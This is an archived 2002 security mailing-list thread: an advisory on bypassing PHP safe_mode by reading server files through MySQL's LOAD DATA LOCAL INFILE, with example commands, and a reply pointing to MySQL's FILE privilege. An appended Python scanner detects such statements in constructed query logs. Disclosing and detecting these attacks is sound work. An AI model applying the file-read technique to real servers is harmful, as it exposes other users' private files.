7945369 2002-02-03 22:21 +0000  /137 lines/ Dave Wilson <dw@DAHOMELANDS.NET>
Sent by: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Imported: 2002-02-04  20:15  by Brevbäraren
External recipient: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
External replies to: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Recipient: NTBugTraq (import) <4390>
Recipient: Bugtraq (import) <20813>
    Sent:     2002-02-05 02:09
Subject: PHP Safe Mode Filesystem Circumvention Problem
------------------------------------------------------------

 ------------------------------------------------------------------------------

                         Security Advisory DW020203-PHP
                           Release: 3rd February 2002

                 PHP Safe Mode Filesystem Circumvention Problem

 Severity:   Medium to high.
 Affects:    PHP, all versions which include safe_mode feature.
 Platform:   UNIX, Microsoft Windows, any platforms on which PHP is available.
 Vendor:     http://php.net.
 Discovered: 12th January 2002, Dave Wilson <dw@dahomelands.net>, using
             PHP 4.1.0 & Apache 2 on Linux.

 ------------------------------------------------------------------------------


VULNERABILITY IN BRIEF

   PHP (since version 3?) includes a commonly used feature known as
   Safe Mode.  When enabled, scripts are highly limited in their
   ability to access or execute local files, among other things.

   PHP relies on a wrapper function around all filesystem calls to
   perform access checks, but unfortunately the bundled MySQL client
   library has not been modified to perform such checks on "LOAD DATA
   INFILE LOCAL" statements.

   If an attacker has access to a MySQL server (either provided by
   you or himself), he can use it as a proxy by which to download
   files residing on the safe_mode-enabled web server. For large ISPs
   relying on this feature for individual customer privacy, it could
   mean clients accessing each other's files, or viewing of files on
   an improperly secured server.


FIX

   Currently, no fix exists. You may use other PHP safe_mode
   functions to disable the use of the MySQL client library, or
   secure your servers in a proper fashion. A suggested fix for the
   PHP developers might be to scan mysql_query()s for strings similar
   to "LOAD DATA LOCAL INFILE".

   Happy hackers out there might like to look at libmysql.c:1764 if interested
   in fixing this problem, although that may only be possible from within PHP.


EXAMPLE

   The attached script will (once configured correctly) attempt to
   read "/var/log/lastlog" via the SQL daemon and return it to the
   client.

   $ cp safe_mode.php /www
   $ wget -qO lastlog_via_mysql localhost/safe_mode.php
   $ diff /var/log/lastlog lastlog_via_mysql; echo $?
   0


COMMENTS

   Due to the nature of the PHP project, development is very rapid
   and hence many sites do not keep up with latest PHP versions. If a
   fix was available, it would take quite a while to propagate.

   It is likely that this is not an isolated problem in PHP, my bets
   are on PostgreSQL and other PHP database extensions missing this
   one too.

   The MySQL support has been enabled in PHP by default for as long
   as I can remember.


DAVE WILSON

   Currently residing in Belfast, Northern Ireland, he is available
   for work relating to network security auditing, post-attack
   recovery and forensics, and penetration testing. He may be
   contacted at <dw@dahomelands.net>. If you have any comments
   regarding this advisory, please contact him directly.


Sun Feb  3 21:23:03 GMT 2002 -dw



(7945369) /Dave Wilson <dw@DAHOMELANDS.NET>/(Reflowed)
Comment in text 7959269 by Ben Wheeler <b.wheeler@ULCC.AC.UK>
7959269 2002-02-05 09:33 +0000  /47 lines/ Ben Wheeler <b.wheeler@ULCC.AC.UK>
Sent by: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Imported: 2002-02-06  22:23  by Brevbäraren
External recipient: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
External replies to: b.wheeler@ULCC.AC.UK
Recipient: NTBugTraq (import) <4408>
Comment on text 7945369 by Dave Wilson <dw@DAHOMELANDS.NET>
Subject: Re: PHP Safe Mode Filesystem Circumvention Problem
------------------------------------------------------------
On Sun, Feb 03, 2002 at 10:21:44PM +0000, Dave Wilson wrote:
>    PHP relies on a wrapper function around all filesystem calls to perform
>    access checks, but unfortunately the bundled MySQL client library has not
>    been modified to perform such checks on "LOAD DATA INFILE LOCAL" statements.
[...]
>    If an attacker has access to a MySQL server (either provided by you or
>    himself), he can use it as a proxy by which to download files

Surely this only works if the (MySQL) username which PHP uses to
access the database has been granted the 'file' privilege to that
database in MySQL's grant tables.

The MySQL manual makes it quite clear that the 'file' privilege
should not routinely be granted.

-- begin quote --

   * Don't give the *file* privilege to all users.  Any user that has
     this privilege can write a file anywhere in the file system with
     the privileges of the `mysqld' daemon!
[...]
     The *file* privilege may also be used to read any file accessible
     to the Unix user that the server runs as.  This could be abused,
     for example, by using `LOAD DATA' to load `/etc/passwd' into a
     table, which can then be read with `SELECT'.

-- end quote --

I think it's not up to PHP to spot things like this, it's up to the
MySQL administrators to set up their databases securely.

--
Ben Wheeler  <b.wheeler@ulcc.ac.uk>
ULCC, but I do not speak for them.

(7959269) /Ben Wheeler <b.wheeler@ULCC.AC.UK>/(Reflowed)
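Added example, not from the advisory, its attached script, or the reply: a Python scan over constructed MySQL general-query-log lines that applies the check the advisory proposes, matching LOAD DATA ... INFILE statements even when case, comments or a LOW_PRIORITY/CONCURRENT modifier would defeat a plain substring test, and separating the LOCAL form (the client, here the PHP host, supplies the file) from the form without LOCAL (mysqld reads its own filesystem, which is what the FILE privilege discussed in the reply governs). The log layout, table names and file paths are constructed.

```python
import re

# Constructed sample in the layout of MySQL's general query log
# (timestamp, thread id, command, argument); not from the advisory.
SAMPLE_LOG = """\
020203 21:23:03       5 Connect     root@localhost on test_database
020203 21:23:03       5 Query       CREATE TEMPORARY TABLE A1012771383 (a LONGBLOB)
020203 21:23:04       5 Query       LOAD DATA LOCAL INFILE '/var/log/lastlog' INTO TABLE A1012771383
020203 21:23:05       6 Query       load data /* split */ low_priority local infile '/etc/hosts' into table t
020203 21:23:06       7 Query       LOAD DATA INFILE '/var/lib/mysql/data.csv' INTO TABLE t
020203 21:23:07       8 Query       SELECT a FROM A1012771383 LIMIT 1
"""

LOG_LINE = re.compile(r"^\s*(?:\S+\s+\S+\s+)?(\d+)\s+Query\s+(.*)$")
# MySQL's grammar allows a priority modifier between DATA and LOCAL.
LOAD_DATA = re.compile(
    r"\bLOAD\s+DATA\s+(?:LOW_PRIORITY\s+|CONCURRENT\s+)?(LOCAL\s+)?INFILE\b")

def normalize_sql(sql):
    """Drop comments and collapse whitespace before keyword matching, so a
    statement split by '/* */' or written in lower case is still caught; a
    plain substring test for 'LOAD DATA LOCAL INFILE' would miss both."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"(--\s|#).*$", " ", sql, flags=re.M)
    return " ".join(sql.split()).upper()

def classify(sql):
    """'local': the client (here the PHP web server) reads the file, which
    is the safe_mode bypass; 'server': mysqld reads its own filesystem,
    which is what the FILE privilege gates; None: not a LOAD DATA."""
    m = LOAD_DATA.search(normalize_sql(sql))
    if not m:
        return None
    return "local" if m.group(1) else "server"

def scan_general_log(text):
    """Return (thread_id, kind, statement) for every LOAD DATA ... INFILE."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m and classify(m.group(2)):
            hits.append((int(m.group(1)), classify(m.group(2)), m.group(2)))
    return hits

if __name__ == "__main__":
    for tid, kind, stmt in scan_general_log(SAMPLE_LOG):
        print(f"thread {tid}: {kind:6} {stmt}")
```

The same normalize-and-match check can sit in a wrapper around the database call; on the MySQL side, later server and client versions also expose a local_infile setting that turns the LOCAL form off outright (not mentioned on the page).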